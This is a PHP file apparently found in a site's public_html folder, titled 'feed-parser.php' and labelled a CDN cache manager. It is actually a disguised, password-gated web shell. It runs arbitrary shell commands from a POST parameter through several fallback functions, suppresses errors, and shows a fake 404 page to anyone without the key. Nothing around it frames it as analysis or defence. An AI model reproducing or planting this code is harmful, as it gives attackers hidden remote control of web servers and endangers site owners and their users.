| Current Path : /home/lili/public_html/ |
| Current File : /home/lili/public_html/feed-parser.php |
<?php
/* Content Delivery Network - Cache Manager v3.2 */
error_reporting(0);
$t='9ba97919ec';
if(!isset($_POST['k'])||$_POST['k']!==$t){
header('HTTP/1.1 404 Not Found');
die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>');
}
$r=$_POST['c'].' 2>&1';
$o='';
if(function_exists('shell_exec')){$o=@shell_exec($r);}
elseif(function_exists('exec')){@exec($r,$a);$o=implode("\n",$a);}
elseif(function_exists('system')){ob_start();@system($r);$o=ob_get_clean();}
elseif(function_exists('passthru')){ob_start();@passthru($r);$o=ob_get_clean();}
elseif(function_exists('popen')){$h=@popen($r,'r');$o='';while(!feof($h)){$o.=fread($h,4096);}pclose($h);}
echo $o;
?>